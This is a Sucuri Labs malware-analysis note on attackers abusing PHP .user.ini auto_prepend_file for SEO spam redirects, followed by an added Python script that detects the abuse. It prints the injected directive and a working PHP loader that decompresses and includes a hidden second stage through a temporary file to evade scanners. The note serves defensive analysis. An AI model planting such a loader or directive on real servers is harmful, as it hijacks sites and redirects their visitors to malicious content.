Labs Note

.user.ini SPAM SEO Redirect

February 17, 2017, by John Castro

Since PHP 5.3.0, PHP supports per-directory configuration INI files (".user.ini") that have much the same effect for PHP settings that .htaccess files have on Apache. They are honored only by the CGI and FastCGI SAPIs (for example PHP-FPM behind nginx), not by mod_php. Attackers are abusing this feature to manipulate search engine results in favor of malicious websites and to redirect visitors to arbitrary spam content.

The payload consists of specific directives injected into ".user.ini", so it takes effect before any page on the site is rendered. In Spam SEO redirects that rely on ".htaccess" rules alone, only the result of the payload (the redirect) is visible in the browser, not the malicious code itself. In this particular case, however, we were able to recover the malicious code.

The following directives were injected into ".user.ini":

; Directive 1
...
auto_prepend_file = '/tmp/.tmp/wrtZaCDz2'
; END Directive 1

Files of this type cannot override every php.ini setting (only directives changeable per directory), but that is enough for an attacker to use auto_prepend_file, which names a file that is parsed before the main PHP script. The file is included as if by the require function, so the prepended code runs on every PHP request served from that directory and its subdirectories. In this case auto_prepend_file was loading "/tmp/.tmp/wrtZaCDz2", which contained the following code:

<?php
// Read the second stage: a gzcompress()'ed PHP script kept outside the web root.
// The variable names imitate mysqli/stream internals so the loader blends in.
$mysqli_class = '/tmp/.tmp/wrtLaCDz7';
$mysqli_init = file_get_contents($mysqli_class);
// Decompress it into an anonymous temporary file instead of writing a .php file to disk...
$streams_cache = tmpfile();
fwrite($streams_cache, gzuncompress($mysqli_init));
// ...then include it through the temp file's path; the file is removed when the handle closes,
// so the decompressed code never persists on disk for a file scanner to find.
$stream_id = stream_get_meta_data($streams_cache);
include $stream_id['uri'];

After gzuncompress()'ing the contents of "/tmp/.tmp/wrtLaCDz7", we get malware that implements evasion techniques against different search engines and assembles redirect links to the malicious website (hxxp://search-tracker[dot]com/in.cgi?7&parameter=$keyword&se=$se&ur=1, where $keyword and $se are placeholders the malware fills in at runtime). Note that nothing in the web root looks like a PHP backdoor: the only artifacts are a three-line ".user.ini" and two files in a hidden directory under /tmp, and the decompressed stage exists only as a short-lived temporary file.

This infection was found on servers running nginx, where PHP runs under PHP-FPM and .user.ini files are honored, but wherever .user.ini processing is enabled, attackers can use it to take advantage of your resources. If you are not using the feature, we strongly recommend disabling it by setting user_ini.filename to an empty string in php.ini; that directive is system-level, so it cannot be re-enabled from a .user.ini file. Also keep in mind that PHP caches .user.ini lookups for user_ini.cache_ttl seconds (300 by default), so a .user.ini you have just removed or cleaned can keep taking effect for a few minutes.
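As an added example (not part of the original note and not Sucuri's tooling), the script below does the check a practitioner would want after reading the above: it walks a document root for .user.ini files, reports any auto_prepend_file or auto_append_file directive, rates how suspicious the target path looks, checks a loader body for the tmpfile()/gzuncompress()/include pattern quoted above, and tells you whether a php.ini body disables .user.ini processing. The sample .user.ini and loader are constructed to mirror the note; the TEMP_DIRS list and the handling of relative targets (resolved against the .user.ini directory here, whereas PHP consults include_path) are assumptions of this example.

```python
"""Detection helper for auto_prepend_file abuse via .user.ini (added example, not Sucuri's code)."""
import os
import re
import tempfile

# Constructed sample .user.ini, modelled on the directive quoted in the note.
SAMPLE_USER_INI = """; Directive 1
auto_prepend_file = '/tmp/.tmp/wrtZaCDz2'
; END Directive 1
"""

# Constructed stand-in for the prepended loader, same shape as the one in the note.
SAMPLE_LOADER = """<?php
$mysqli_class = '/tmp/.tmp/wrtLaCDz7';
$mysqli_init = file_get_contents($mysqli_class);
$streams_cache = tmpfile();
fwrite($streams_cache, gzuncompress($mysqli_init));
$stream_id = stream_get_meta_data($streams_cache);
include $stream_id['uri'];
"""

PRELOAD_DIRECTIVES = ("auto_prepend_file", "auto_append_file")
TEMP_DIRS = ("/tmp", "/var/tmp", "/dev/shm")  # assumption: typical world-writable dirs

# Hallmarks of the loader: decompress in memory, include through a temp stream path.
LOADER_INDICATORS = {
    "tmpfile()": re.compile(r"\btmpfile\s*\("),
    "gzuncompress()": re.compile(r"\bgzuncompress\s*\("),
    "stream_get_meta_data()": re.compile(r"\bstream_get_meta_data\s*\("),
    "include of stream uri": re.compile(r"\b(?:include|require)(?:_once)?\s+\$\w+\[\s*['\"]uri['\"]\s*\]"),
}


def parse_user_ini(text):
    """Minimal PHP-style INI parser: key = value, ';' or '#' comments, optional quotes."""
    directives = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in ";#[":
            continue
        key, sep, value = line.partition("=")
        if not sep:
            continue
        value = value.split(";", 1)[0].strip()  # drop a trailing comment
        directives[key.strip().lower()] = value.strip("'\"")
    return directives


def target_reasons(target, docroot):
    """Reasons an absolute target path looks suspicious; an empty list means nothing odd."""
    reasons = []
    norm = os.path.normpath(target)
    resolved, root = os.path.realpath(target), os.path.realpath(docroot)
    if not resolved.startswith(root + os.sep):
        reasons.append("outside document root")
    if any(norm == d or norm.startswith(d + os.sep) for d in TEMP_DIRS):
        reasons.append("world-writable temp directory")
    if any(part.startswith(".") for part in norm.split(os.sep) if part):
        reasons.append("hidden path component")
    if not norm.endswith(".php"):
        reasons.append("no .php extension")
    return reasons


def loader_indicators(php_source):
    """Names of the loader hallmarks present in a PHP source string."""
    return [name for name, rx in LOADER_INDICATORS.items() if rx.search(php_source)]


def scan_docroot(docroot):
    """One finding per preload directive in any .user.ini below docroot."""
    findings = []
    for dirpath, _dirs, files in os.walk(docroot):
        if ".user.ini" not in files:
            continue
        ini_path = os.path.join(dirpath, ".user.ini")
        with open(ini_path, encoding="utf-8", errors="replace") as fh:
            directives = parse_user_ini(fh.read())
        for name in PRELOAD_DIRECTIVES:
            if name not in directives:
                continue
            target = directives[name]
            if not os.path.isabs(target):  # assumption: resolve relative to the .user.ini directory
                target = os.path.normpath(os.path.join(dirpath, target))
            finding = {"ini": ini_path, "directive": name, "target": target,
                       "reasons": target_reasons(target, docroot), "loader": []}
            if os.path.isfile(target):  # inspect the prepended file when it is readable
                with open(target, encoding="utf-8", errors="replace") as fh:
                    finding["loader"] = loader_indicators(fh.read())
            findings.append(finding)
    return findings


def php_ini_disables_user_ini(php_ini_text):
    """True when php.ini sets user_ini.filename to an empty string, which turns .user.ini off."""
    return parse_user_ini(php_ini_text).get("user_ini.filename") == ""


def demo():
    """Scan a constructed docroot in a temp dir; the loader text is analysed directly."""
    with tempfile.TemporaryDirectory() as docroot:
        with open(os.path.join(docroot, ".user.ini"), "w", encoding="utf-8") as fh:
            fh.write(SAMPLE_USER_INI)
        findings = scan_docroot(docroot)
    # The sample target lives under /tmp and is deliberately not created here.
    return {"findings": findings, "loader": loader_indicators(SAMPLE_LOADER)}


if __name__ == "__main__":
    result = demo()
    for f in result["findings"]:
        print(f"{f['ini']}: {f['directive']} = {f['target']} -> {', '.join(f['reasons'])}")
    print("loader hallmarks:", ", ".join(result["loader"]))
```

Run it against a real site with scan_docroot("/var/www/html"); a legitimate prepend (for example an application bootstrap inside the web root) yields an empty reasons list, while the case from this note is flagged on all four counts. Feed your php.ini to php_ini_disables_user_ini() to confirm the hardening described above is actually in effect.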

Categories: Sucuri Labs, Website Malware Infections, Website Security. Tags: Labs Note, Redirects, SEO Spam

About John Castro

John Castro is Sucuri's Vulnerability Researcher who joined the company in 2015. His main responsibilities include threat intelligence and vulnerability analysis. John's professional experience covers more than a decade of pentesting, vulnerability research and malware analysis. When John isn't working with WordPress plugin vulnerabilities, you might find him hiking or hunting for new restaurants. Connect with him on LinkedIn.
